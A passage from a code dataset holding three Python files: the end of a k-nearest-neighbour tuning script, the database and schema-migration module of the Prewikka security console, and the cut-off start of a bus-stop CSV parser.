(np.sum(y_pred == y_vali)/len(y_vali))*100\naccuracy_p.append(round(acc2, 2))\nif (acc1 > acc2): #Find which value gave superior accuracy\n p = 1\nelse:\n p = 2\nif (acc1 == acc2):\n print(\"Distance method was inconsequential\") #Note if this didn't matter\n\n#Analysis based on optimised hyperparameters\nprint(\"Fully trained. Selected hyperparameters:\\nk: \", k, \"\\nLeaf size: \", leaf_size, \"\\nMeasurement distance: \", end='')\nif (p == 1):\n print(\"Manhatten\")\nelif (p == 2):\n print(\"Euclidean\")\nelse:\n print (\"Error undf\")\nknn = KNeighborsClassifier(n_neighbors=k, leaf_size=leaf_size, p=p) #Assemble final optimal model\nknn.fit(X_train, y_train)\ntoc = time.perf_counter()\ntime_train = round((toc-tic),4) #Stop training timer. We have the final model.\ntic = time.perf_counter() #Start testing timer\ny_pred = knn.predict(X_test) #Now we can test using the test set (rather than validation)\ntoc = time.perf_counter()\ntime_test = round((toc-tic),4) #Record testing time\n\n# Results display\nprint(\"\\nFully tested. Displaying results:\")\n# Plot accuracy results for various k values\nplt.figure(figsize=(6, 6))\nplt.plot(range(1, k_lim), accuracy_k, color='blue', linestyle='dashed', marker='o',\n markerfacecolor='blue', markersize=10)\nplt.title('Accuracy per K value')\nplt.xlabel('K Value')\nplt.ylabel('Tested Accuracy')\nplt.show()\n# Plot accuracy results for various leaf sizes\nplt.figure(figsize=(6, 6))\nplt.plot(range(1, l_lim), accuracy_l, color='blue', linestyle='dashed', marker='o',\n markerfacecolor='blue', markersize=10)\nplt.title('Accuracy for given leaf size')\nplt.xlabel('Leaf size n')\nplt.ylabel('Tested Accuracy')\nplt.show()\n\n# Measurement Reports\n# Print out distance measurement comparison. Only two values so no need for plot\nprint(\"Distance comparison: \", \"Manhatten(\", accuracy_p[0], \"%) | Euclidean: (\", accuracy_p[1], \"%)\")\n# SKLearn classification report\nprint(classification_report(y_test, y_pred))\n# Time outputs\nprint(\"Data collection time: \", time_data, \"s\")\nprint(\"Training time: \", time_train, \"s\")\nprint(\"Testing time: \", time_test, \"s\")\n\n# Plot a pie chart showing ratio of feature extraction time vs. training time.\n# Testing time omitted after it was found to be completely negligable compared to the other two\npie_labels = 'Feature extraction', 'Training'#, 'Testing'\ntime_sum = time_data+time_train\npie_vals = [time_data/time_sum, time_train/time_sum]\nfig1, ax1 = plt.subplots()\nax1.pie(pie_vals, labels=pie_labels, startangle=90)\nax1.axis('equal')\nplt.show()\n\n# KNN algorithm finish","repo_name":"DJoska/DSP_Project","sub_path":"knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8373797151","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport abc\nimport collections\nimport fcntl\nimport functools\nimport operator\nimport pkgutil\nimport re\nimport time\nfrom datetime import datetime\n\nimport pkg_resources\nimport preludedb\nfrom prewikka import compat, error, log, utils, version\nfrom prewikka.utils import cache\n\n\nNotNone = object\nModuleInfo = collections.namedtuple(\"ModuleInfo\", [\"branch\", \"version\", \"enabled\"])\n\n\nclass DatabaseError(error.PrewikkaUserError):\n name = N_(\"Database error\")\n\n def __init__(self, message, **kwargs):\n error.PrewikkaUserError.__init__(self, message=message, **kwargs)\n\n\nclass DatabaseSchemaError(DatabaseError):\n name = N_(\"Database schema error\")\n\n\n# Internal workaround since SWIG generated exception use class RuntimeError\ndef _fix_exception(func):\n def inner(self, *args, **kwargs):\n try:\n ret = func(self, *args, **kwargs)\n except RuntimeError as e:\n raise DatabaseError(message=text_type(e))\n\n return ret\n return inner\n\n\ndef _use_flock(func):\n\n def inner(self, *args, **kwargs):\n fd = open(__file__, 'r')\n\n fcntl.flock(fd, fcntl.LOCK_EX)\n try:\n ret = func(self, *args, **kwargs)\n finally:\n fcntl.flock(fd, fcntl.LOCK_UN)\n\n return ret\n\n return inner\n\n\ndef use_transaction(func):\n @functools.wraps(func)\n def inner(self, *args, **kwargs):\n db = getattr(self, \"__db\", env.db)\n\n if db._transaction_state:\n return func(self, *args, **kwargs)\n\n db.transaction_start()\n try:\n ret = func(self, *args, **kwargs)\n except:\n db.transaction_abort()\n raise\n\n db.transaction_end()\n return ret\n\n return inner\n\n\ndef use_lock(table):\n def real_decorator(func):\n\n @use_transaction\n def inner(self, *args, **kwargs):\n db = getattr(self, \"__db\", env.db)\n\n db._lock_table(table)\n\n try:\n ret = func(self, *args, **kwargs)\n except:\n db._unlock_table(table)\n raise\n\n db._unlock_table(table)\n return ret\n\n return inner\n\n return real_decorator\n\n\nclass SQLScript(object):\n \"\"\"This is the main class describing an SQL script (install / update / branch migration)\n\n ::type:: Describe the kind of database script : \"branch\", \"update\", \"install\"\n ::version:: Version the database is going to use after successful insertion of the script\n ::branch:: Optional name of the branch this script apply to\n ::from_branch:: Optional, the script only apply if the current (branch, version) is the one specified\n\n type = \"branch\" from_branch=(\"branch\", \"version\") branch=\"B\" version=\"target\"\n type = \"update\" version=\"target\" optional=[branch]\n type = \"install\" version=\"target\" optional=[branch]\n\n \"\"\"\n\n __metaclass__ = abc.ABCMeta\n __all__ = [\"type\", \"branch\", \"version\", \"from_branch\"]\n\n type = \"update\"\n branch = None\n version = None\n from_branch = None\n\n def __init__(self, dbup):\n self.db = dbup\n self.query_logs = []\n self._module_name = dbup._module_name\n self._full_module_name = dbup._full_module_name\n self._query_filter = {\"sqlite3\": self._mysql2sqlite,\n \"pgsql\": self._mysql2pgsql,\n \"mysql\": self._mysqlhandler}[self.db.get_type()]\n\n if self.type in (\"install\", \"update\"):\n if not self.version:\n raise Exception(\"SQL %s script require 'version' attribute\" % self.type)\n\n elif self.type == \"branch\":\n if not all(getattr(self, i) for i in (\"from_branch\", \"branch\", \"version\")):\n raise Exception(\"SQL branch script require 'from_branch', 'branch', and 'version' attribute\")\n\n @staticmethod\n def _sub(_stbl, input):\n for i in _stbl:\n input = re.sub(i[0], i[1], input)\n\n return input\n\n def _mysql2pgsql(self, input):\n _stbl = [\n (\"#.*\", \"\"),\n (\" INT UNSIGNED NOT NULL PRIMARY KEY AUTO_INCREMENT\", \" SERIAL PRIMARY KEY\"),\n (\"BIGINT UNSIGNED NOT NULL PRIMARY KEY AUTO_INCREMENT\", \"BIGSERIAL PRIMARY KEY\"),\n (\"BLOB\", \"BYTEA\"),\n (\" TINYINT UNSIGNED \", \" INT4 \"),\n (\" TINYINT \", \" INT2 \"),\n (\" SMALLINT UNSIGNED \", \" INT8 \"),\n (\" SMALLINT \", \" INT4 \"),\n (\" BIGINT UNSIGNED \", \" INT8 \"),\n (\" BIGINT \", \" INT8 \"),\n (\" INT(EGER)? UNSIGNED \", \" INT8 \"),\n (\" INT(EGER)? \", \" INT4 \"),\n (\"DATETIME\", \"TIMESTAMP\"),\n (\"ENGINE=InnoDB\", \"\"),\n (\"\\\"([^\\\"]*)\\\"\", \"'\\\\1'\"),\n (\"\\\"\\([^\\\"]*\\)\\\"\", \"'\\1'\"),\n (\"(\\S*) ENUM\\((.*)\\)\", \"\\\\1 TEXT CHECK (\\\\1 IN (\\\\2))\"),\n (\"VARCHAR[ ]*[^)]+\\)\", \"TEXT\"),\n (\"(DROP INDEX [^ ]*) ON [^;]*\", \"\\\\1\")\n ]\n\n return self._sub(_stbl, input)\n\n def _mysql2sqlite(self, input):\n _stbl = [\n (\"#.*\", \"\"),\n (\"[a-zA-Z]*INT \", \"INTEGER \"),\n (\"UNSIGNED \", \"\"),\n (\"ENUM[ ]*[^)]+\\)\", \"TEXT\"),\n (\"VARCHAR[ ]*[^)]+\\)\", \"TEXT\"),\n (\"AUTO_INCREMENT\", \"AUTOINCREMENT\"),\n (\"ENGINE=InnoDB\", \"\"),\n (\"ALTER TABLE [^ ]* DROP.*\", \"\"),\n (\"(DROP INDEX [^ ]*) ON [^;]*\", \"\\\\1\")\n ]\n\n return self._sub(_stbl, input)\n\n def _mysqlhandler(self, input):\n return input\n\n def query(self, input):\n for q in self._query_filter(input).split(\";\"):\n q = q.strip()\n if q:\n self.query_logs.append(q)\n self.db.query(q)\n\n @abc.abstractmethod\n def run(self):\n pass\n\n @use_transaction\n def apply(self):\n log.get_logger().info(\"%s: please standby while %s is applied\", self._full_module_name, text_type(self))\n\n self.run()\n\n if self.type == \"install\":\n self.db.upsert(\n \"Prewikka_Module_Registry\",\n (\"module\", \"branch\", \"version\"),\n ((self._full_module_name, self.branch, self.version),),\n pkey=(\"module\",)\n )\n\n elif self.type == \"update\":\n self.db.query(\"UPDATE Prewikka_Module_Registry SET version=%s WHERE module=%s%s\" %\n (self.db.escape(self.version),\n self.db.escape(self._full_module_name),\n self.db._chknull(\"branch\", self.branch)))\n\n elif self.type == \"branch\":\n self.db.query(\"UPDATE Prewikka_Module_Registry SET branch=%s, version=%s, enabled=1 WHERE module=%s\",\n self.branch, self.version, self._full_module_name)\n\n self.db._update_state(self.version, self.branch)\n\n def get_version_string(self):\n if not self.branch:\n return self.version\n else:\n return \"%s[%s]\" % (self.branch, self.version)\n\n def __str__(self):\n return \"%s:%s\" % (self.type, self.get_version_string())\n\n def __eq__(self, other):\n return all(getattr(self, i) == getattr(other, i) for i in self.__all__)\n\n\nclass DatabaseHelper(object):\n def __getattr__(self, x):\n return self.__dict__.get(x, getattr(env.db, x))\n\n\nclass DatabaseUpdateHelper(DatabaseHelper):\n def __init__(self, module_name, reqversion, reqbranch=None, enabled=True):\n self._reqbranch = reqbranch\n self._reqversion = reqversion\n self._module_name = module_name.split(\":\")[0]\n self._full_module_name = module_name\n self._default_modinfo = ModuleInfo(None, None, enabled)\n self._initialized = False\n\n def _init_version_attr(self):\n if self._initialized:\n return\n\n module = env.db.modinfos.get(self._full_module_name, self._default_modinfo)\n\n self._from_branch = module.branch\n self._from_version = module.version\n self._need_enable = not(module.enabled)\n self._initialized = True\n\n def check(self):\n self._init_version_attr()\n\n if not self._from_version and self._reqversion:\n raise DatabaseSchemaError(N_(\"database installation required\"))\n\n if self._need_enable:\n raise DatabaseSchemaError(N_(\"database activation required\"))\n\n if self._reqbranch and self._from_branch != self._reqbranch:\n raise DatabaseSchemaError(N_(\"database schema branch %(required)s required (found %(current)s)\",\n {'required': self._reqbranch, 'current': self._from_branch}))\n\n if self._reqversion and self._from_version != self._reqversion:\n raise DatabaseSchemaError(N_(\"database schema version %(required)s required (found %(current)s)\",\n {'required': self._get_version_string(self._reqbranch, self._reqversion),\n 'current': self._get_version_string(self._from_branch, self._from_version)}))\n\n def _update_state(self, version, branch):\n self._from_branch = branch\n self._from_version = version\n\n def _get_update_directories(self):\n for i in pkg_resources.iter_entry_points(\"prewikka.updatedb\", self._module_name):\n try:\n yield i.load().__path__[0]\n except Exception as e:\n log.get_logger().exception(\"[%s]: error loading SQL updates: %s\", self._full_module_name, e)\n\n def _get_schema_list(self, **kwargs):\n from_version = to_version = None\n\n if \"from_version\" in kwargs:\n from_version = pkg_resources.parse_version(kwargs.pop(\"from_version\"))\n\n if \"to_version\" in kwargs:\n to_version = pkg_resources.parse_version(kwargs.pop(\"to_version\"))\n\n dirnames = self._get_update_directories()\n\n for importer, package_name, _ in pkgutil.iter_modules(dirnames):\n try:\n mod = importer.find_module(package_name).load_module(package_name).SQLUpdate(self)\n except Exception as e:\n log.get_logger().exception(\"[%s]: error loading SQL update '%s' : %s\" %\n (self._full_module_name, package_name, e))\n continue\n\n if any(kwargs[k] != getattr(mod, k) for k in kwargs.keys()):\n continue\n\n version = pkg_resources.parse_version(mod.version)\n if (not from_version or (version > from_version)) and (not to_version or (version <= to_version)):\n yield mod\n\n def _resolve_branch_switch(self, curbranch, curversion, outstack=[]):\n for upd in self._list(from_branch=(curbranch, curversion), type=\"branch\"):\n if upd.branch == self._reqbranch and pkg_resources.parse_version(upd.version) <= pkg_resources.parse_version(self._reqversion):\n return outstack + [upd]\n\n elif upd in outstack:\n log.get_logger().warning(\"cyclic branch dependencies detected: %s\", \" -> \".join(text_type(i) for i in outstack + [upd]))\n continue\n\n else:\n ret = self._resolve_branch_switch(upd.branch, upd.version, outstack=outstack[:] + [upd])\n if ret:\n return ret\n\n for upd in self._list(from_version=curversion, branch=curbranch, type=\"update\"):\n ret = self._resolve_branch_switch(upd.branch, upd.version, outstack=outstack[:] + [upd])\n if ret:\n return ret\n\n return []\n\n def _list(self, *args, **kwargs):\n fv = self._get_schema_list(*args, **kwargs)\n return sorted(fv, key=operator.attrgetter(\"version\"))\n\n def _get_install_schema(self):\n ret = self._list(to_version=self._reqversion, branch=self._reqbranch, type=\"install\")\n if not ret:\n raise error.PrewikkaUserError(N_(\"Database installation error\"),\n N_(\"No database installation script found for module %(module)s, version %(version)s\",\n {'module': self._full_module_name, 'version': self._get_version_string(self._reqbranch, self._reqversion)}))\n\n return ret[-1]\n\n def _get_branch_update(self):\n prev = self._resolve_branch_switch(self._from_branch, self._from_version)\n if not prev:\n raise error.PrewikkaUserError(\n N_(\"Database migration error\"),\n N_(\"No database branch migration script found for module %(module)s, branch transition %(current)s -> %(required)s\",\n {'module': self._full_module_name,\n 'current': self._get_version_string(self._from_branch, self._from_version),\n 'required': self._get_version_string(self._reqbranch, \"<=\" + self._reqversion)})\n )\n\n return prev\n\n @staticmethod\n def _get_version_string(branch, version):\n if not branch:\n return version\n else:\n return \"%s[%s]\" % (branch, version)\n\n def list(self):\n if not self._reqversion:\n return []\n\n self._init_version_attr()\n from_version, prev = self._from_version, []\n\n if not from_version:\n prev = [self._get_install_schema()]\n\n elif self._from_branch != self._reqbranch:\n prev = self._get_branch_update()\n\n if prev:\n from_version = prev[-1].version\n\n if from_version == self._reqversion:\n return prev\n\n ret = self._list(from_version=from_version, to_version=self._reqversion, branch=self._reqbranch, type=\"update\")\n if not(ret) or ret[-1].version != self._reqversion:\n raise error.PrewikkaUserError(\n N_(\"Database migration error\"),\n N_(\"No linear migration script found for module %(module)s %(version1)s -> %(version2)s\",\n {'module': self._full_module_name,\n 'version1': self._get_version_string(self._from_branch, self._from_version),\n 'version2': self._get_version_string(self._reqbranch, self._reqversion)})\n )\n\n return prev + ret\n\n @use_transaction\n def _apply(self):\n [update.apply() for update in self.list()]\n self.check()\n\n @_use_flock\n def apply(self):\n # We call _init_version_attr() outside the transaction because it fails\n # when the tables do not exist (eg. during database initialization)\n # and we don't want the whole transaction to be rolled back.\n self._init_version_attr()\n self._apply()\n\n def get_schema_version(self):\n self._init_version_attr()\n return self._from_version\n\n\nclass DatabaseCommon(object):\n required_branch = version.__branch__\n required_version = \"0\"\n\n NotNone = NotNone\n __sentinel = object()\n\n __TRANSACTION_STATE_NONE = 0\n __TRANSACTION_STATE_BEGIN = 1\n __TRANSACTION_STATE_QUERY = 2\n\n @_fix_exception\n def __init__(self, settings):\n self.__ESCAPE_PREFILTER = {\n bool: int,\n datetime: lambda dt: self.escape(self.datetime(dt)),\n \"iterable\": self._prefilter_iterate,\n }\n\n self._transaction_state = self.__TRANSACTION_STATE_NONE\n\n stpl = tuple((k, v) for k, v in settings.items())\n self._db = preludedb.SQL(settings)\n\n self._version = self._db.getServerVersion()\n self._dbhash = hash(stpl)\n self._dbtype = settings[\"type\"]\n\n def _get_prefilter(self, v):\n if not(isinstance(v, (text_type, bytes))) and isinstance(v, collections.Iterable):\n return self.__ESCAPE_PREFILTER[\"iterable\"]\n else:\n return self.__ESCAPE_PREFILTER.get(type(v))\n\n def _prefilter_iterate(self, l):\n tmp = []\n for v in l:\n tmp.append(text_type(self.escape(v)))\n\n if self._get_prefilter(v) == self._prefilter_iterate:\n fmt = '%s'\n else:\n fmt = '(%s)'\n\n return fmt % ', '.join(tmp)\n\n @staticmethod\n def parse_datetime(date):\n if \".\" in date:\n fmt = \"%Y-%m-%d %H:%M:%S.%f\"\n else:\n fmt = \"%Y-%m-%d %H:%M:%S\"\n\n return datetime.strptime(date, fmt).replace(tzinfo=utils.timeutil.timezone(\"UTC\"))\n\n @staticmethod\n def datetime(t):\n if t is None:\n return None\n\n if isinstance(t, datetime):\n # Only timezone-aware datetimes are accepted\n return t.astimezone(utils.timeutil.timezone(\"UTC\")).strftime(\"%Y-%m-%d %H:%M:%S.%f\")\n else:\n return time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime(t))\n\n def kwargs2query(self, kwargs, prefix=\"\"):\n if not kwargs:\n return \"\"\n\n qs = []\n for field, val in kwargs.items():\n if not val:\n qs.append(\"%s IS NULL\" % (field))\n\n elif val is NotNone:\n qs.append(\"%s IS NOT NULL\" % (field))\n\n else:\n op = \"=\"\n if isinstance(val, (list, tuple)):\n op = \"IN\"\n\n elif isinstance(val, bool):\n val = int(val)\n\n qs.append(\"%s %s %s\" % (field, op, self.escape(val)))\n\n return prefix + \" AND \".join(qs)\n\n def query(self, sql, *args, **kwargs):\n if self._transaction_state == self.__TRANSACTION_STATE_BEGIN:\n self._db.transactionStart()\n self._transaction_state = self.__TRANSACTION_STATE_QUERY\n\n if args:\n sql = sql % tuple(self.escape(value) for value in args)\n elif kwargs:\n sql = sql % dict((key, self.escape(value)) for key, value in kwargs.items())\n\n return self._db.query(sql)\n\n def _chk(self, key, value, join=\"AND\"):\n if value is not None:\n return \" %s %s = %s\" % (join, key, self.escape(value))\n\n return \"\"\n\n def _chknull(self, key, value, join=\"AND\"):\n if value is None:\n return \" %s %s IS NULL\" % (join, key)\n else:\n return self._chk(key, value, join=join)\n\n @staticmethod\n def _mklist(value):\n if isinstance(value, (list, tuple)):\n return value\n else:\n return (value,)\n\n def get_type(self):\n return self._dbtype\n\n def escape(self, data):\n prefilter = self._get_prefilter(data)\n if prefilter:\n return prefilter(data)\n\n if not isinstance(data, compat.STRING_TYPES):\n return data if data is not None else \"NULL\"\n\n return self._db.escape(data)\n\n def escape_binary(self, data):\n return self._db.escapeBinary(data)\n\n def unescape_binary(self, data):\n return self._db.unescapeBinary(data)\n\n def get_last_insert_ident(self):\n return self._db.getLastInsertIdent()\n\n def _get_merge_value(self, merged, field, rownum):\n value = merged[field]\n if not isinstance(value, (tuple, list)):\n return value\n\n if rownum >= len(value):\n raise Exception(\"merge value should be unique, or list with the same number of rows\")\n\n return value[rownum]\n\n def _upsert_prepare_row(self, table, fields, row):\n return text_type(self.escape(row))\n\n def _upsert_prepare(self, table, pkey, fields, values_rows, returning=[], merge={}, func=None):\n up = []\n if func:\n up = [\"%s=%s\" % (f, func(f)) for f in fields]\n\n merged = {} if isinstance(merge, int) else merge\n\n vl = []\n delq = []\n\n for idx, row in enumerate(values_rows):\n vl.append(self._upsert_prepare_row(table, fields, row))\n\n if not merge:\n continue\n\n tmpl1 = []\n tmpl2 = []\n for field, value in zip(fields, row):\n if field in merged:\n tmpl1.append(\"%s = %s\" % (field, self.escape(self._get_merge_value(merged, field, idx))))\n\n elif field in pkey:\n tmpl2.append(\"%s = %s\" % (field, self.escape(value)))\n\n delq.append(\" AND \".join([\" AND \".join(tmpl1), \"NOT(\" + \" AND \".join(tmpl2) + \")\"]))\n\n if not vl:\n delq.append(\" AND \".join(\"%s = %s\" % (f, self.escape(v)) for f, v in merged.items()))\n\n return \", \".join(fields), \", \".join(vl), \", \".join(up), \", \".join(returning), \" AND \".join(delq)\n\n def _unlock_table(self, table):\n pass\n\n def transaction_start(self):\n # The actual transaction will be started on the first query\n self._transaction_state = self.__TRANSACTION_STATE_BEGIN\n\n def transaction_end(self):\n if self._transaction_state == self.__TRANSACTION_STATE_QUERY:\n self._db.transactionEnd()\n\n self._transaction_state = self.__TRANSACTION_STATE_NONE\n\n def transaction_abort(self):\n if self._transaction_state == self.__TRANSACTION_STATE_QUERY:\n self._db.transactionAbort()\n\n self._transaction_state = self.__TRANSACTION_STATE_NONE\n\n def __hash__(self):\n return self._dbhash\n\n\nclass MySQLDatabase(DatabaseCommon):\n def _lock_table(self, table):\n self.query(\"LOCK TABLES %s\" % \", \".join(t + \" WRITE\" for t in self._mklist(table)))\n\n def _unlock_table(self, table):\n self.query(\"UNLOCK TABLES;\")\n\n def _mysql_upsert(self, table, pkey, fields, values_rows, returning=[], merge={}):\n if returning:\n values_rows = list(values_rows)\n\n fieldfmt, vlfmt, upfmt, retfmt, delfmt = self._upsert_prepare(table, pkey, fields, values_rows, returning, merge, lambda x: \"VALUES(%s)\" % x)\n\n if vlfmt:\n self.query(\"INSERT INTO %s (%s) VALUES %s ON DUPLICATE KEY UPDATE %s\" % (table, fieldfmt, vlfmt, upfmt))\n\n if delfmt:\n self.query(\"DELETE FROM %s WHERE %s\" % (table, delfmt))\n\n if retfmt:\n wh = []\n for row in values_rows:\n vl = \" AND \".join([\"%s = %s\" % (field, self.escape(row[i])) for i, field in enumerate(pkey)])\n wh.append(\"(%s)\" % vl)\n\n return self.query(\"SELECT %s FROM %s WHERE %s\" % (retfmt, table, \" OR \".join(wh)))\n\n @use_transaction\n def upsert(self, table, fields, values_rows, pkey=[], returning=[], merge={}):\n if not pkey:\n pkey = fields\n\n return self._mysql_upsert(table, pkey, fields, values_rows, returning, merge)\n\n\nclass PgSQLDatabase(DatabaseCommon):\n def _lock_table(self, table):\n self.query(\"LOCK TABLE %s IN EXCLUSIVE MODE\" % \", \".join(self._mklist(table)))\n\n @cache.memoize(\"table_info\")\n def _get_table_info(self, table):\n out = {}\n typemap = {\"bigint\": \"integer\", \"smallint\": \"integer\", \"character varying\": \"text\"}\n\n for field, _type, defval in self.query(\"SELECT column_name, data_type, column_default FROM information_schema.columns WHERE table_name = %s\", table.lower()):\n out[field] = utils.AttrObj(type=_type, generic_type=typemap.get(_type, _type), default=defval, auto_increment=\"nextval\" in (defval or \"\"))\n\n return out\n\n def _upsert_prepare_row(self, table, fields, row):\n out = []\n dtype = self._get_table_info(table)\n\n for f, v in zip(fields, row):\n cast = \"\"\n\n if self._version >= 90500 and dtype[f].auto_increment and v is None:\n v = \"DEFAULT\"\n else:\n if dtype[f].generic_type != \"text\":\n cast = \"::%s\" % dtype[f].type\n\n v = text_type(self.escape(v)) + cast\n\n out.append(v)\n\n return \"(\" + text_type(\", \".join(out)) + \")\"\n\n def _pgsql_upsert_cte_query(self, table, pkey, upfmt, fields, fieldfmt, vlfmt, retfmt):\n up_pkfmt = []\n in_pkfmt = []\n for v in pkey:\n up_pkfmt.append(\"%s.%s = nv.%s\" % (table, v, v))\n in_pkfmt.append(\"updated.%s = nv.%s\" % (v, v))\n\n dtype = self._get_table_info(table)\n insfmt = \", \".join(filter(lambda x: not(dtype[x].auto_increment), fields))\n\n update = \"UPDATE %s SET %s FROM nv WHERE %s RETURNING %s.*\" % (table, upfmt, \" AND \".join(up_pkfmt), table)\n insert = \"INSERT INTO %s (%s) SELECT %s FROM nv WHERE NOT EXISTS (SELECT 1 FROM updated WHERE %s)\" % (table, insfmt, insfmt, \" AND \".join(in_pkfmt))\n if retfmt:\n insert = \"%s RETURNING %s\" % (insert, retfmt)\n\n query = \"WITH nv (%s) AS (VALUES %s), updated AS (%s)\" % (fieldfmt, vlfmt, update)\n if retfmt:\n query = \"%s, inserted AS (%s) SELECT %s FROM inserted UNION ALL SELECT %s FROM updated\" % (query, insert, retfmt, retfmt)\n else:\n query = \" \".join((query, insert))\n\n return self.query(query)\n\n def _pgsql_upsert_cte(self, table, pkey, fields, values_rows, returning=[], merge={}):\n fieldfmt, vlfmt, upfmt, retfmt, delfmt = self._upsert_prepare(table, pkey, fields, values_rows, returning, merge, lambda x: \"nv.%s\" % x)\n\n self._lock_table(table)\n try:\n if vlfmt:\n ret = self._pgsql_upsert_cte_query(table, pkey, upfmt, fields, fieldfmt, vlfmt, retfmt)\n\n if delfmt:\n self.query(\"DELETE FROM %s WHERE %s\" % (table, delfmt))\n finally:\n self._unlock_table(table)\n\n if vlfmt and retfmt:\n return ret\n\n def _pgsql_upsert(self, table, pkey, fields, values_rows, returning=[], merge={}):\n fieldfmt, vlfmt, upfmt, retfmt, delfmt = self._upsert_prepare(table, pkey, fields, values_rows, returning, merge, lambda x: \"EXCLUDED.%s\" % (x))\n if vlfmt:\n if retfmt:\n retfmt = \" RETURNING %s\" % retfmt\n\n ret = self.query(\"INSERT INTO %s (%s) VALUES %s ON CONFLICT (%s) DO UPDATE SET %s%s\" % (table, fieldfmt, vlfmt, \",\".join(pkey), upfmt, retfmt))\n\n if delfmt:\n self.query(\"DELETE FROM %s WHERE %s\" % (table, delfmt))\n\n if vlfmt and retfmt:\n return ret\n\n def _pgsql_upsert_emulate_single(self, table, pkey, fields, row, fieldfmt, retfmt):\n up_fmt = []\n wh_fmt = []\n vl_fmt = []\n\n for i, v in enumerate(fields):\n if v in pkey:\n wh_fmt.append(\"%s = %s\" % (v, self.escape(row[i])))\n\n up_fmt.append(\"%s = %s\" % (v, self.escape(row[i])))\n vl_fmt.append(text_type(self.escape(row[i])))\n\n ret = self.query(\"UPDATE %s SET %s WHERE %s%s\" % (table, \", \".join(up_fmt), \" AND \".join(wh_fmt), retfmt))\n if ret:\n return ret\n\n return self.query(\"INSERT INTO %s (%s) SELECT %s WHERE NOT EXISTS (SELECT 1 FROM %s WHERE %s)%s\" %\n (table, fieldfmt, \", \".join(vl_fmt), table, \" AND \".join(wh_fmt), retfmt))\n\n def _pgsql_upsert_emulate(self, table, pkey, fields, values_rows, returning=[], merge={}):\n values_rows = list(values_rows)\n\n fieldfmt, _, _, retfmt, delfmt = self._upsert_prepare(table, pkey, fields, values_rows, returning, merge)\n if retfmt:\n retfmt = \" RETURNING %s\" % retfmt\n\n returning = []\n self._lock_table(table)\n\n try:\n for row in values_rows:\n ret = self._pgsql_upsert_emulate_single(table, pkey, fields, row, fieldfmt, retfmt)\n if ret and retfmt:\n returning.append(ret[0])\n\n if delfmt:\n self.query(\"DELETE FROM %s WHERE %s\" % (table, delfmt))\n\n finally:\n self._unlock_table(table)\n\n return returning\n\n @use_transaction\n def upsert(self, table, fields, values_rows, pkey=[], returning=[], merge={}):\n if not pkey:\n pkey = fields\n\n if self._version >= 90500:\n ret = self._pgsql_upsert(table, pkey, fields, values_rows, returning, merge)\n\n elif self._version >= 90100:\n ret = self._pgsql_upsert_cte(table, pkey, fields, values_rows, returning, merge)\n\n else:\n ret = self._pgsql_upsert_emulate(table, pkey, fields, values_rows, returning, merge)\n\n return ret\n\n\nclass NoDatabase(DatabaseCommon):\n def query(self, *args, **kwargs):\n raise error.PrewikkaUserError(N_(\"Database configuration error\"), N_(\"Only MySQL and PostgreSQL databases are supported at the moment\"))\n\n\nclass Database(object):\n def __new__(cls, settings):\n type = settings.get(\"type\")\n if type == \"pgsql\":\n return PgSQLDatabase(settings)\n\n elif type == \"mysql\":\n return MySQLDatabase(settings)\n\n else:\n return NoDatabase(settings)\n\n\nclass PrewikkaDatabase(object):\n def __new__(cls, config):\n settings = {\"host\": \"localhost\", \"name\": \"prewikka\", \"user\": \"prewikka\", \"type\": \"mysql\"}\n settings.update(config.items())\n\n type = settings[\"type\"]\n if type == \"pgsql\":\n return PrewikkaPgSQLDatabase(settings)\n\n elif type == \"mysql\":\n return PrewikkaMySQLDatabase(settings)\n\n else:\n return PrewikkaNoDatabase(settings)\n\n\nclass PrewikkaDatabaseCommon(DatabaseCommon):\n def __init__(self):\n env.db = self\n dh = DatabaseUpdateHelper(\"prewikka\", self.required_version, self.required_branch)\n dh.apply()\n\n self._last_plugin_activation_change = self._get_last_plugin_changed()\n\n @cache.memoize_property(\"modinfos_cache\")\n def modinfos(self):\n try:\n rows = self.query(\"SELECT module, branch, version, enabled FROM Prewikka_Module_Registry\")\n except:\n return {}\n\n return dict((i[0], ModuleInfo(i[1], i[2], int(i[3]))) for i in rows)\n\n def is_plugin_active(self, plugin):\n module = self.modinfos.get(plugin.full_module_name)\n if module:\n return module.enabled == 1\n\n return plugin.plugin_enabled\n\n def _get_last_plugin_changed(self):\n rows = self.query(\"SELECT time FROM Prewikka_Module_Changed\")[0][0]\n return utils.timeutil.get_timestamp_from_string(rows)\n\n def has_plugin_changed(self):\n last = self._get_last_plugin_changed()\n\n if last <= self._last_plugin_activation_change:\n return False\n\n self._last_plugin_activation_change = last\n self.modinfos_cache.clear()\n\n return True\n\n def trigger_plugin_change(self):\n self.query(\"UPDATE Prewikka_Module_Changed SET time=current_timestamp\")\n\n\nclass PrewikkaPgSQLDatabase(PgSQLDatabase, PrewikkaDatabaseCommon):\n def __init__(self, settings):\n PgSQLDatabase.__init__(self, settings)\n PrewikkaDatabaseCommon.__init__(self)\n\n\nclass PrewikkaMySQLDatabase(MySQLDatabase, PrewikkaDatabaseCommon):\n def __init__(self, settings):\n MySQLDatabase.__init__(self, settings)\n PrewikkaDatabaseCommon.__init__(self)\n\n\nclass PrewikkaNoDatabase(NoDatabase, PrewikkaDatabaseCommon):\n def __init__(self, settings):\n NoDatabase.__init__(self, settings)\n PrewikkaDatabaseCommon.__init__(self)\n","repo_name":"Prelude-SIEM/prewikka","sub_path":"prewikka/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":31042,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"1383977322","text":"import csv\nimport os\ndir_path = os.path.dirname(os.path.realpath(__file__))\nstop = {}\n\nstop_id = []\nstop_name = []\nstop_lat = []\nstop_lon = []\nzone_id = []\nlocation_type = []\nstop_timezone = []\n\nwith open(str(dir_path + \"/bus_en/stops.csv\"),'rt',encoding = 'utf8') as f:\n stop_dict = csv.DictReader(f ,delimiter=',')\n for row in stop_dict:\n stop_id.append(row['stop_id'])\n stop_name.append(row['stop_name'])\n stop_lat.append(row['stop_lat'])\n stop_lon.append(row['stop_lon'])\n location_type.append(row['location_type'])\n stop_timezone.append(row['stop_timezone'])\n\nfor i in range(len(stop_id)):\n stop[str(stop_id[i])] = 